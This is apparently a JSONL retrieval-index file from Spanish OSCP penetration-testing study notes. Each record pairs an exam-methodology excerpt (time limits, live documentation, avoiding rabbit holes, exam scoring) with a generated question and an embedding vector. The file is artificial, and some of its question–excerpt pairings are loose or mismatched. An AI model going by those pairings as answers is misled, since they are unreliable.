-0.03413, -0.07777, -0.01436, 0.03905, -0.03091, 0.04143, -0.00309, -0.03806, 0.11106, 0.02616, -0.02636, 0.08637, -0.05383, 0.01039, -0.04133, -0.02221, 0.02159, -0.07871, 0.04508, 0.05749, -0.00462, -0.0682, -0.05526, -0.00533, -0.00463, -0.04487, 0.02861, -0.01215, 0.01966, 0.04259, 0.00896, -0.02623, -0.04568, -0.08415, -0.01953, -0.04201, 0.04451, -0.00047, -0.00711, 0.06558, 0.05795, -0.08351, 0.03722, 0.04134, -0.02363, -0.01782, -0.04121, -0.01424, -0.16292, -0.03002, 0.03653, -0.05601, -0.00725, -0.01303, 0.07734, 0.00369, -0.01867, -0.10815, 0.01904, -0.05463, -0.04538, -2e-05, -0.05637, 0.00121, -0.01213, -0.01121, 0.00079, -0.01791, 0.05621, -0.0374, 0.04528, -0.01107, -0.04124, 0.0432, 0.04153, -0.01255, -0.06116, 0.03344, -0.06619, 0.01741, -0.00779, 0.00078, -0.01689, -0.05665, -0.02644, -0.03577, -0.00044, 0.02845, 0.01576, -0.0468, -0.08384, -0.04875, -0.03959, -0.0004, 0.07132, 0.01327, 0.06409, -0.07288, -0.05321, -0.04768, -0.04247, 0.01886, -0.05094, -0.01701, 0.02604, 0.05357, 0.04013, 0.08842, -0.017, -0.07114, -0.00998, 0.0086, 0.00259, 0.03167, -0.03749, 0.00915, 0.01005, 0.01347, 0.11424, 0.00362, -0.08954, -0.06029, -0.02751, 0.03078, -0.00064, 0.0236, 0.0154, -0.06109, -0.05971, -0.03162, -0.05297, -0.0043, -0.06701, 0.00834, -0.05381, -0.0617, 0.03954, -0.01276, 0.03266, 0.02939]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas\n- **1.5h sin progreso = cambia de mΓ‘quina.** Cierra, vuelve mΓ‘s tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo β†’ ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto estΓ‘ bloqueado cuesta horas.", "indexar": "ΒΏQuΓ© mΓ©todo sirve para identificar rΓ‘pidamente los usuarios vΓ‘lidos antes de intentar entrar como administrador?", "v": [-0.09622, 0.27793, -0.17788, -0.19788, -0.01296, -0.10374, -0.02512, -0.11487, -0.10991, -0.10575, 0.02659, -0.13413, 0.09601, 0.02251, 0.08319, -0.02236, 0.16873, -0.11876, 0.06217, -0.0325, 0.00922, -0.09281, -0.01385, -0.0521, -0.11739, 0.03623, -0.01655, -0.04731, -0.07738, -0.05498, -0.0379, -0.05737, -0.0008, -0.10395, -0.09148, -0.0462, 0.03501, 0.06702, -0.07537, 0.21681, 0.00411, -0.02808, -0.08088, 0.02214, 0.07682, 0.00272, -0.0427, -0.05334, 0.01309, 0.07305, 0.03127, -0.04679, -0.07969, 0.01129, -0.06408, -0.04975, 0.0378, -0.04716, 0.01062, -0.06621, -0.08734, -0.01259, 0.03306, 0.09495, -0.0193, -0.09426, 0.10587, 0.04475, -0.02539, 0.06189, -0.08014, -0.01034, -0.01334, -0.0126, -0.01055, 0.07973, 0.0446, 0.03098, 0.11434, -0.04987, 0.08507, -0.0319, -0.06963, -0.10065, -0.08537, -0.11484, 0.01189, -0.11407, 0.01837, -0.06709, -0.02799, -0.00864, 0.13179, -0.0091, 0.05427, -0.00968, 0.06927, 0.0148, -0.01268, 0.06343, 0.041, -0.04147, -0.09318, 0.17801, -0.01063, 0.04644, 0.02939, -0.01909, -0.02873, -0.1371, -0.00738, -0.06835, -0.12642, 0.0337, -0.04866, 0.04907, -0.03885, -0.0726, -0.08703, 0.03528, -0.08959, -0.0078, -0.03414, -0.01236, 0.08144, 0.00906, 0.09303, 0.06679, 0.03636, 0.01865, -0.05352, -0.04397, -0.0538, 0.02922, -0.07188, 0.02499, 0.01873, -0.04873, -0.02316, 0.04582, -0.06596, 0.03946, -0.03313, -0.0854, 0.06374, -0.03753, 0.03195, -0.12833, -0.05966, -0.04456, -0.00164, -0.01917, -0.08583, 0.09281, -0.00199, -0.0526, 0.07888, -0.07965, -0.0926, 0.04634, 0.00857, -0.01569, 0.05327, 0.02852, -0.03984, -0.05802, -0.01847, -0.04947, 0.05958, -0.00868, 0.01756, 0.0474, 0.02599, -0.02106, 0.05336, 0.01899, -0.02879, -0.06251, 0.03018, -0.02669, 0.03049, 0.02129, 0.00666, -0.00348, -0.06755, -0.07016, 0.03561, 0.05215, 0.00098, 0.0955, 0.06077, 0.02738, -0.00415, 0.00805, -0.03952, 0.00953, 0.02345, -0.00672, -0.03051, -0.04409, -0.0059, -0.00509, 0.02311, -0.00166, 0.0205, -0.03656, -0.03637, -0.00659, 0.05786, 0.03718, 0.00641, 0.02228, 0.10342, -0.00309, -0.0306, -0.02729, -0.00422, -0.03628, -0.0225, -0.04617, 0.00186, 0.02631, 0.01781, 0.03461, -0.00727, -0.01437, 0.01516, -0.04238, 0.00304, 0.04272, -0.03009, -0.00971, 0.01454, 0.01593, 0.0601, -0.04889, 0.06004, -0.05519, -0.02129, -0.04099, 0.03562, 0.01471, 0.0141, 0.04251, -0.05094, -0.02783, -0.02144, 0.02942, -0.02453, -0.05374, 0.03925, -0.02949, 0.01622, -0.01067, 0.0021, -0.04316]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## DocumentaciΓ³n en vivo\n- Captura **TODO** mientras lo haces (Flameshot/Greenshot), **no al final** β€” al final no recuerdas el comando exacto.\n- Cada flag con hostname visible. Ver Reporte OSCP.", "indexar": "quΓ© herramienta sirve para capturar todo en pantalla mientras trabajo?", "v": [0.02782, 0.1132, -0.19464, -0.17708, 0.0152, -0.19008, -0.01884, 0.01441, 0.04517, -0.07742, -0.07704, -0.05077, 0.00893, -0.00685, 0.02535, 0.08379, 0.06835, -0.07118, 0.01752, -0.01647, -0.06488, 0.02537, -0.06096, -0.08567, -0.09645, -0.06793, 0.03751, 0.04358, -0.21989, -0.00832, 0.00956, 0.08222, 0.11231, -0.0837, -0.04298, -0.1142, -0.07419, 0.04924, -0.07522, 0.03528, 0.04669, 0.13326, -0.13509, -0.00062, 0.03389, 0.00846, 0.08913, -0.02591, -0.05661, 0.13665, -0.07394, -0.02439, -0.07042, -0.04685, -0.07538, -0.06179, 0.18124, -0.05647, 0.06175, -0.06813, -0.05462, 0.04535, -0.09559, -0.0577, 0.02178, -0.05266, 0.02908, -0.00747, -0.04498, 0.05501, -0.00768, 0.07553, 0.01459, -0.0181, -0.00445, 0.02151, -0.11827, 0.04004, 0.043, -0.06198, 0.02254, -0.03528, -0.10341, -0.01318, -0.09194, -0.03452, 0.06353, -0.02828, -0.09752, -0.15997, 0.02245, 0.08573, 0.01041, -0.01952, 0.00238, 0.02927, 0.02162, -0.03756, -0.01721, 0.04397, 0.16858, -0.16235, -0.08779, -0.01529, -0.09642, 0.09672, -0.04141, -0.03012, -0.10698, -0.04332, -0.01839, 0.04268, -0.04653, 0.07003, -0.07821, 0.01103, -0.01059, -0.06658, -0.00546, -0.07136, 0.00404, 0.07674, -0.02947, -0.05923, 0.07772, -0.01921, 0.01797, 0.07488, 0.00061, -0.04921, -0.01249, -0.01925, -0.07093, 0.05762, -0.00359, -0.07091, 0.14274, -0.07342, -0.03555, -0.13238, -0.00196, 0.01372, -0.01018, -0.12059, 0.05659, 0.06266, 0.10643, 0.01488, -0.05495, 0.00419, 0.03579, -0.07065, 0.01617, 0.01602, -0.00476, 0.01875, -0.0195, 0.01431, -0.06035, 0.01956, 0.05504, -0.08606, -0.01757, 0.05213, -0.0116, -0.04737, -0.03619, -0.04925, 0.07568, 0.05173, 0.05364, 0.00198, 0.08059, -0.12385, 0.02432, -0.07489, 0.0109, 0.05589, 0.02508, -0.08172, -0.03986, 0.11752, 0.02545, -0.00869, 0.03036, -0.01202, 0.04662, -0.06591, -0.03505, 0.06497, -0.00588, 0.01902, -0.01082, -0.04576, 0.01813, -0.06817, -0.00793, 0.00179, 0.07195, 0.0043, 0.00746, -0.08985, -0.02191, -0.01191, 0.05053, 0.03853, -0.04652, 0.05142, -0.01819, 0.01624, -0.00301, 0.02109, 0.04363, -0.02249, 0.00805, -0.03379, 0.07245, 0.01692, -0.03697, 0.03769, 0.07214, -0.00806, 0.00272, 0.02328, -0.02585, 0.01853, 0.02237, 0.00793, -0.04062, -0.03515, 0.06484, 0.00199, -0.00972, 0.00602, -0.02011, -0.01837, 0.00694, -0.02177, -0.05382, -0.02535, 0.00713, 0.02239, -0.05103, -0.01334, -0.03066, -0.01494, 0.00195, 0.00714, 0.01064, -0.10855, -0.07965, 0.01888, 0.03775, 0.00851, 0.00103, 0.00802]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## DocumentaciΓ³n en vivo\n- Captura **TODO** mientras lo haces (Flameshot/Greenshot), **no al final** β€” al final no recuerdas el comando exacto.\n- Cada flag con hostname visible. Ver Reporte OSCP.", "indexar": "hay alguna alternativa gratuita a Flameshot o Greenshot?", "v": [-0.15299, 0.05649, -0.08085, -0.06643, -0.15638, -0.00998, -0.13217, -0.0644, -0.01891, -0.02151, -0.0133, -0.05566, -0.06528, 0.13802, 0.13791, -0.00808, -0.02625, -0.02882, -0.06953, -0.00905, -0.17632, 0.0405, -0.08382, -0.20244, -0.08948, -0.13142, -0.08322, 0.04757, 0.03916, 0.05921, 0.22534, -0.00375, 0.07678, 0.00078, -0.15011, -0.04213, 0.13577, -0.07005, 0.17141, 0.02213, -0.00884, -0.03735, -0.05685, 0.06452, -0.08058, 0.03443, -0.15747, 0.04225, -9e-05, -0.03399, 0.01524, -0.07811, 0.00433, -0.01077, 0.03411, -0.00282, 0.05189, -0.13082, -0.11484, -0.14198, -0.00606, 0.07215, 0.09404, -0.03571, 0.00358, 0.07316, 0.00966, 0.04372, -0.03869, 0.01658, -0.0074, -0.01649, 0.00832, -0.09046, -0.15579, -0.04347, -0.01911, -0.03076, -0.02026, 0.20354, -0.00885, -0.13447, 0.03331, 0.00119, -0.05867, -0.04434, -0.02622, 0.00285, 0.05693, 0.0605, 0.0572, 0.03707, 0.03587, 0.14373, 0.01142, -0.08873, 0.06915, -0.02619, -0.04548, 0.03699, 0.04683, 0.0574, -0.05333, -0.00742, 0.02984, -0.08178, -0.02297, 0.0241, -0.08385, 0.08029, -0.07725, 0.02595, 0.11092, 0.08463, -0.00395, -0.0556, 0.00841, -0.00657, 0.03392, -0.04201, 0.00622, 0.05105, -0.05617, -0.00627, 0.05014, 0.03131, -0.03161, -0.03908, -0.06827, 0.01166, -0.0695, -0.01854, 0.04301, -0.02324, -0.08555, -0.01159, 0.09073, -0.02117, -0.03063, 0.01341, -0.07492, -0.02702, 0.04235, -0.05754, 0.00011, -0.01309, 0.03155, -0.07337, 0.0346, -0.0647, 0.00837, -0.04591, -0.02602, 0.04525, 0.01384, 0.0534, -0.00925, 0.06172, -0.03215, 0.09283, 0.00905, -0.09527, 0.05347, 0.07267, -0.00549, -0.00509, 0.0223, -0.00236, -0.08722, -0.0059, 0.02025, 0.04703, -0.089, 0.05599, 0.02691, -0.089, 0.00243, -0.11506, 0.0395, -0.03679, 0.075, -0.00156, -0.04918, -0.01963, 0.01636, 0.03822, 0.02194, 0.04311, -0.01882, 0.03445, 0.00113, -0.0556, -0.04999, -0.01415, -0.00615, 0.07872, 0.04677, -0.01848, -0.0487, 0.01132, -0.11233, 0.0291, -0.02374, 0.03663, 0.06009, -0.04017, 0.02901, 0.04934, -0.05584, 0.01012, -0.03309, 0.03414, 0.06456, -0.02154, 0.02416, -0.02943, 0.06521, -0.03289, -0.03892, -0.03099, 0.10481, -0.00429, 0.02195, 0.00084, 0.02102, 0.02507, 0.04394, 0.02981, -0.01526, 0.0094, -0.03483, 0.01157, 0.01391, 0.02857, -0.02886, -0.01047, 0.04966, 0.04974, -0.03167, -0.03978, 0.00634, -0.01053, 0.00507, 0.05398, -0.01734, -0.03817, -0.00064, -0.04408, 0.00163, -0.02931, -0.02243, 0.02368, -0.04963, 0.02095, -0.00413, 0.00632]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti rabbit-hole\n- EnumeraciΓ³n exhaustiva primero, luego un vector a la vez β†’ Trampas de enumeraciΓ³n.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un seΓ±uelo.\n\nRelacionado: MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "cual es una metodologia para atacar uno en vez de muchos a la vez?", "v": [0.02143, 0.10613, -0.09676, 0.15107, -0.10971, 0.01891, 0.05045, 0.03873, -0.13558, -0.05433, 0.03803, -0.04024, 0.01763, 0.04938, 0.11161, -0.03842, 0.11499, -0.05197, 0.05819, 0.04137, 0.02026, -0.07489, -0.02958, -0.04095, -0.04981, 0.00685, 0.0855, 0.01898, -0.08738, -0.0215, -0.08091, 0.04144, 0.02074, -0.07777, 0.06259, -0.04016, -0.02129, 0.02518, 0.01952, 0.10776, -0.16795, -0.01315, -0.19416, -0.06897, 0.04663, -0.01509, -0.01335, -0.02301, -0.0319, 0.02618, 0.05673, 0.07907, -0.03316, 0.00335, -0.0239, -0.01468, 0.03093, -0.06935, 0.0294, -0.01802, -0.03717, 0.01463, 0.03352, -0.05927, 0.09328, -0.07026, -0.02946, -0.00743, -0.09569, 0.02278, 0.03279, 0.0256, -0.05465, 0.00949, -0.00392, 0.08185, 0.0351, 0.05397, 0.06824, 0.03044, 0.0028, -0.14922, -0.139, 0.0755, -0.10714, -0.02257, 0.1246, -0.14419, -0.05119, -0.10788, -0.05474, 0.01708, -0.06089, -0.00255, -0.07366, -0.01617, 0.15524, -0.00389, 0.00804, 0.01004, -0.02685, 0.02848, -0.15343, 0.07076, -0.0161, 0.01582, -0.06459, -0.05209, 0.04383, -0.11024, -0.05577, -0.07086, -0.0179, 0.02689, -0.04245, -0.04722, 0.01995, 0.02582, -0.0481, -0.12905, -0.15653, 0.00077, -0.04438, 0.00321, 0.04367, 0.02315, -0.03984, -0.01411, 0.0052, -0.00702, -0.01177, 0.04433, 0.03937, 0.07721, -0.00494, 0.00784, 0.10438, -0.10052, -0.10749, 0.02539, 0.07518, 0.10319, 0.02757, -0.08243, 0.0881, 0.03454, 0.04139, -0.09978, -0.14655, -0.03432, -0.05906, 0.0804, 0.08437, 0.07471, -0.08222, -0.0542, 0.02901, -0.04297, -0.03023, 0.14639, -0.0263, -0.00221, 0.03058, 0.00134, 0.02574, -0.05327, -0.00697, -0.10634, 0.0551, -0.01109, 0.00267, 0.03366, -0.01299, 0.01975, 0.05084, -0.02293, -0.04712, -0.06668, 0.05389, -0.02875, -0.03139, -0.01172, -0.06178, -0.00079, 0.01864, -0.02394, -0.00746, 0.03587, 0.06082, 0.05184, 0.02218, -0.03639, -0.00051, 0.00402, -0.01698, -0.01347, -0.00669, -0.01284, 0.02093, 0.03374, -0.06001, -0.05766, -0.0432, -0.05154, 0.03729, 0.08701, -0.04777, -0.00842, -0.0695, 0.00098, 0.0537, -0.04489, 0.07447, -0.04073, -0.09333, -0.0574, -0.0716, -0.08262, 0.03057, 0.045, 0.08458, 0.07817, 0.06225, -0.03864, -0.04838, 0.05067, 0.00389, -0.02869, -0.00647, -0.04092, -0.06422, -0.06357, -0.03131, -0.02402, 0.01152, 0.05303, 0.05286, -0.09186, -0.10259, -0.09561, 0.02153, 0.03041, -0.04224, -0.0049, -0.014, -0.09119, -0.12953, 0.03149, -0.01228, -0.07216, -0.03485, 0.05793, 0.05243, -0.00784, 0.04506, -0.09366]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti rabbit-hole\n- EnumeraciΓ³n exhaustiva primero, luego un vector a la vez β†’ Trampas de enumeraciΓ³n.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un seΓ±uelo.\n\nRelacionado: MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "como puedo saber si el vector que estoy usando es real o una trampa?", "v": [0.07323, 0.12986, -0.28443, 0.05447, 0.01061, 0.02702, 0.04238, -0.03329, 0.13111, -0.07692, -0.05857, -0.06142, 0.00256, 0.02047, 0.00149, 0.1493, 0.02934, -0.00147, 0.15561, -0.08887, 0.05759, -0.16335, -0.10826, -0.03732, -0.00151, 0.04329, -0.04825, 0.02655, -0.09673, -0.06181, 0.02163, 0.09377, 0.03166, -0.17863, -0.06751, 0.00624, 0.0322, -0.04149, 0.05137, 0.09682, 0.12015, 0.05925, 0.00524, 0.05428, -0.0185, 0.05659, -0.04107, -0.13375, -0.07289, -0.0087, -0.16651, 0.01673, -0.16837, -0.06579, -0.08926, -0.16905, 0.10372, -0.10637, 0.1085, -0.00787, -0.01717, -0.02511, -0.00273, -0.00322, -0.02857, -0.0287, 0.08823, -0.03331, -0.05139, -0.06096, 0.04587, 0.02004, -0.08847, 0.01715, 0.0287, 0.00355, 0.06951, -0.07179, 0.11687, -0.00922, 0.01888, -0.07424, 0.012, 0.0702, 0.03216, -0.06481, 0.03165, -0.03458, 0.03743, -0.08108, -0.01568, 0.18245, 0.04259, 0.03756, -0.01636, -0.06666, 0.02321, -0.04526, 0.01295, -0.00184, 0.0726, 0.04145, -0.16647, 0.01745, -0.01894, 0.04112, 0.07037, -0.10752, 0.00015, -0.04624, -0.01574, 0.05435, -0.08477, 0.00552, 0.0213, -0.00871, -0.05306, -0.00027, -0.01018, -0.03745, -0.11956, -0.00329, -0.05267, -0.0117, 0.05109, -0.07648, -0.05015, 0.04129, 0.0107, 0.02889, -0.00919, 0.00886, -0.06523, -0.10187, -0.01973, 0.00097, 0.01717, 0.02928, 0.06071, -0.05466, -0.03022, 0.10469, -0.00958, -0.10414, -0.04195, -0.01094, -0.04888, -0.09733, -0.01017, -0.04053, 0.02693, -0.01574, 0.09286, 0.10234, 0.04993, -0.05817, 0.02944, -0.03598, -0.01908, 0.07948, -0.03818, -0.00196, -0.06761, -0.0556, -0.01013, 0.00981, -0.00313, 0.00449, -0.02533, 0.0647, -0.04821, 0.04784, 0.02094, -0.0055, 0.01534, -0.01478, -0.05072, -0.00022, -0.02943, -0.03671, 0.00819, -0.01025, -0.04213, 0.02428, -0.00102, -0.00843, -0.01129, 0.02994, 0.00722, 0.1023, 0.05969, 0.00584, 0.05266, 0.01984, -0.0233, 0.00075, 0.04829, 0.03354, -0.00722, -0.11986, -0.04577, 0.01734, 0.02866, -0.05064, 0.06014, -0.01961, -0.05176, 0.02642, 0.01357, 0.04553, 0.06276, -0.00584, 0.03114, -0.0879, -0.01401, -0.01959, -0.00356, 0.06656, -0.02025, -0.04392, 0.01962, 0.06906, 0.05138, 0.04357, -0.05239, 0.01324, -0.00544, 0.03776, 0.00381, 0.06431, -0.05406, 0.03485, 0.03559, -0.03229, 0.0153, 0.00892, 0.01317, 0.00234, -0.07882, -0.11358, 0.0038, 0.01967, -0.04266, -0.07479, -0.04109, -0.00859, -0.08403, 0.01643, -0.00746, -0.04839, -0.00397, 0.05416, 0.09546, -0.04573, 0.04165, -0.02434]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti rabbit-hole\n- EnumeraciΓ³n exhaustiva primero, luego un vector a la vez β†’ Trampas de enumeraciΓ³n.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un seΓ±uelo.\n\nRelacionado: MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "que herramientas me ayudan a hacer enumeracion exhaustiva primero?", "v": [0.02911, 0.17939, -0.28912, -0.08432, 0.07231, -0.00567, -0.05161, 0.05148, -0.15469, -0.07328, -0.18825, 0.029, 0.0513, -0.05182, 0.07383, 0.03468, 0.0609, -0.04452, 0.0421, 0.06844, 0.02413, 0.06125, -0.13526, 0.033, -0.10714, -0.0477, 0.03805, 0.0151, -0.19305, 0.13642, 0.03057, 0.11144, 0.03472, -0.03505, -0.06393, -0.01066, -0.07318, -0.00747, 0.04353, 0.09138, -0.04975, 0.00288, -0.05548, -0.03123, 0.01393, 0.01398, -0.09228, 0.0492, -0.04698, 0.03096, -0.11389, -0.10414, -0.03834, -0.1526, -0.02211, -0.17191, 0.11963, -0.12854, -0.05285, -0.13116, -0.0465, -0.02057, -0.01533, 0.05333, -0.00391, 0.22107, -0.04744, -0.1826, -0.00093, 0.09452, -0.06431, 0.0181, 0.07847, -0.09743, -0.02114, -0.08192, 0.05525, 0.07709, 0.05071, -0.00469, 0.02266, -0.00664, 0.02173, -0.03747, -0.00532, -0.01378, 0.0294, 0.03249, 0.00995, -0.0836, -0.03249, 0.02299, -0.07406, 0.00565, 0.02826, 0.08206, 0.02312, 0.0325, 0.04972, 0.0337, 0.09309, -0.11082, -0.0161, 0.02936, -0.00058, -0.02077, 0.02271, -0.03559, -0.10649, -0.04117, 0.0264, 0.01918, 0.02229, -0.05321, -0.06665, -0.02102, -0.09089, -0.07925, -0.02297, -0.0858, 0.06216, 0.02043, -0.0828, 0.04232, -0.00071, -0.05218, 0.00342, 0.04986, 0.06905, -0.07596, 0.03469, -0.03022, -0.02055, -0.05082, -0.00026, 0.00321, 0.04971, -0.05114, -0.03092, -0.09422, 0.00389, -0.00474, -0.05902, -0.0746, 0.07387, -0.03399, 0.02722, -0.02013, -0.00117, 0.01756, -0.01721, -0.00147, 0.08743, 0.04026, 0.02001, 0.01361, 0.06794, 0.05635, 0.0362, 0.00524, -0.02306, -0.05347, 0.07499, -0.01587, 0.00528, -0.0506, 0.0823, 0.06677, -0.02236, 0.02797, 0.03303, 0.02078, 0.02381, -0.00557, -0.02766, -0.01959, -0.00406, -0.04139, -0.01826, -0.00783, 0.01505, -0.00857, -0.05245, -0.04541, -0.00995, -0.05606, 0.02484, -0.08062, -0.01556, 0.10093, -0.05685, 0.03564, -0.03733, -0.07912, 0.02633, -0.01611, -0.02646, -0.02478, 0.03621, -0.06984, 0.01504, -0.01188, -0.03102, -0.06405, 0.00629, 0.05067, -0.09729, -0.024, -0.02199, 0.02549, 0.03337, 0.00882, 0.01555, -0.04724, -0.02663, 0.02932, -0.02455, -0.00283, -0.05931, -0.04489, 0.02933, -0.00804, 0.07367, 0.04397, -0.00407, 0.05807, 0.07212, 0.05734, 0.00273, 0.04111, 0.01441, -0.0851, -0.00605, -0.03782, -0.00558, -0.08107, 0.04348, -0.04123, -0.04237, 0.04096, 0.03146, -0.01098, -0.01645, 0.01604, -0.04901, -0.03688, 0.05786, -0.01655, -0.04142, -0.03181, -0.0382, 0.00601, 0.03824, 0.00555, 0.05626, -0.04497]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## ComposiciΓ³n\n- **Set de Active Directory = 40 puntos seguidos.**\n - 3 mΓ‘quinas **encadenadas**. Si te atascas en la mΓ‘quina 1, no avanzas a 2 y 3.\n - **Empieza por aquΓ­ con tiempo.** Es todo-o-nada por cadena.\n - Ver Active Directory para el flujo completo.\n- **3 standalones independientes**, 20 pts cada una.\n - `user` (10 pt = `local.txt`) + `root/system` (10 pt = `proof.txt`).\n - **Saca el `user` de las 3 ANTES** de obsesionarte con el root de una.", "indexar": "que programa sirve para hackear Active Directory en cadena?", "v": [-0.08894, 0.00489, -0.16173, -0.21412, 0.01903, -0.15199, -0.0557, 0.0351, -0.01818, 0.05369, 0.02774, -0.12791, -0.13267, -0.14376, 0.07258, 0.0409, 0.10144, -0.1561, 0.07192, -0.01883, -0.0396, 0.14254, -0.06617, -0.05314, -0.00545, 0.03708, 0.00335, 0.09623, -0.10235, -0.02359, 0.09103, 0.01321, 0.05578, -0.03232, -0.03107, -0.06337, -0.02993, -0.01366, 0.14261, 0.08749, -0.06723, 0.04387, -0.11522, -0.03327, 0.03438, 0.15572, 0.1279, -0.05799, 0.0069, 0.04894, -0.05634, -0.0155, -0.1005, 0.02696, 0.11218, -0.09705, -0.10684, -0.0518, -0.07474, -0.05703, -0.00721, -0.08242, 0.072, -0.08427, -0.02006, -0.04962, 0.14208, -0.06276, -0.12141, 0.01346, -0.02349, 0.01336, 0.03085, 0.13264, -0.02094, -0.0098, 0.08447, -0.03947, -0.00899, 0.05533, 0.03469, -0.0162, 0.09718, 0.06598, -0.09789, -0.0347, 0.07125, -0.0227, 0.0154, -0.03202, 0.09246, 0.10543, -0.01462, 0.06955, 0.07734, -0.02409, 0.14888, 0.04257, 0.09336, -0.00605, 0.04872, -0.09179, -0.03916, 0.13538, -0.04814, 0.1486, 0.02559, 0.10055, -0.04158, 0.05352, -0.02354, -0.01693, -0.00684, -0.05656, -0.01705, 0.06872, -0.07191, -0.01958, 0.05988, 0.02338, -0.11345, -0.00111, 0.02523, 0.08005, 0.05469, 0.01832, -0.07782, 0.04719, 0.00149, 0.0511, -0.0258, 0.02535, 0.02707, -0.07307, -0.10269, -0.118, -0.00115, -0.01074, 0.00379, -0.10282, -0.00523, 0.04086, 0.01996, 0.03678, 0.02632, -0.04017, 0.07253, -0.06567, -0.01687, 0.02498, 0.008, 0.0985, -0.00616, -0.01421, -0.03378, 0.00014, 0.01968, -0.05996, 0.01087, 0.09167, -0.00575, -0.0413, -0.04078, -0.01715, -0.01156, -0.06347, -0.04887, 0.00454, 0.06436, 0.10273, -0.03645, 0.11938, 0.06241, -0.10008, 0.01243, 0.00152, 0.00318, -0.04055, 0.06788, -0.03452, -0.02963, 0.03032, 0.02207, 0.01253, -0.03063, -0.0341, 0.01477, 0.01316, 0.00299, -0.00542, 0.02218, 0.02145, -0.0248, -0.00417, -0.07557, -0.04895, -0.00629, -0.03167, 0.06687, -0.07523, -0.00329, 0.0321, 0.02128, 0.01299, 0.02914, 0.06928, 0.00631, 0.02389, 0.05141, 0.11013, -0.01323, -0.05279, 0.08288, 0.0413, -0.04609, 0.02659, 0.04618, 0.06383, 0.01078, 0.06693, -0.04808, 0.00424, 0.01393, 0.04204, 0.01227, -0.05634, 0.00989, 0.01479, 0.00165, -0.00345, 0.00249, -0.05072, 0.01168, -0.01598, -0.01001, -0.01599, -0.01557, -0.00941, -0.01888, -0.05712, -0.06615, 0.04855, -0.01106, 0.01137, -0.02513, -0.00811, -0.02142, 0.00252, -0.00417, -0.01651, -0.04306, 0.02023, -0.02239, -0.05334, -0.01758, 0.02697]} -{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## ComposiciΓ³n\n- **Set de Active Directory = 40 puntos seguidos.**\n - 3 mΓ‘quinas **encadenadas**. Si te atascas en la mΓ‘quina 1, no avanzas a 2 y 3.\n - **Empieza por aquΓ­ con tiempo.** Es todo-o-nada por cadena.\n - Ver Active Directory para el flujo completo.\n- **3 standalones independientes**, 20 pts cada una.\n - `user` (10 pt = `local.txt`) + `root/system` (10 pt = `proof.txt`).\n - **Saca el `user` de las 3 ANTES** de obsesionarte con el root de una.", "indexar": "con que puedo montar un ataque de todo-o-nada en Active Directory?", "v": [-0.04962, 0.15325, -0.16223, -0.08078, -0.1926, 0.06654, -0.05728, 0.11739, -0.17042, 0.06179, 0.11841, -0.16869, -0.03378, -0.03856, 0.05397, -0.01418, 0.09667, -0.0859, 0.02384, -0.05218, -0.0247, -0.0014, 0.00817, 0.0086, 0.07873, 0.11403, -0.02981, 0.0844, -0.05095, -0.10387, 0.00997, 0.01908, 0.05495, 0.02128, 0.10316, -0.14822, -0.04137, -0.02116, 0.15005, 0.05538, -0.11019, -0.01652, -0.16327, 0.04965, 0.08884, 0.10863, 0.06447, -0.10381, 0.06429, 0.08398, 0.08047, -0.00105, -0.11847, -0.06997, -0.0282, -0.01251, 0.0324, -0.06194, 0.04079, -0.1092, -0.04912, 0.05707, -0.09426, -0.04797, -0.01282, -0.04423, 0.08017, -0.04463, -0.11338, 0.00988, 0.01784, -0.06365, -0.02945, 0.12554, 0.03472, -0.00793, 0.09788, 0.03354, -0.05061, 0.11276, 0.05096, -0.03401, -0.00185, 0.02976, -0.09723, -0.11873, 0.0144, -0.14016, -0.04589, -0.02554, 0.06186, 0.05393, -0.05121, -0.00493, -0.0975, -0.02269, 0.05419, 0.05061, 0.03823, -0.02742, -0.0667, -0.03206, -0.01071, 0.14787, 0.07217, 0.01822, -0.02535, 0.04713, 0.01131, -0.01956, -0.01221, -0.05673, -0.04758, -0.09685, 0.04476, 0.00551, -0.13429, -0.00024, -0.00383, 0.09343, -0.08747, 0.00886, 0.07402, 0.07722, -0.02645, 0.00482, 0.01613, -0.00787, -0.07066, 0.07374, -0.0063, 0.04977, 0.07289, -0.10765, -0.00829, 0.00493, -0.04582, -0.02566, 0.00595, -0.01461, -0.01128, 0.02333, 0.02018, 0.00662, -0.01753, 0.02125, 0.0001, -0.00973, -0.05689, 0.03683, 0.04078, 0.0993, 0.07292, 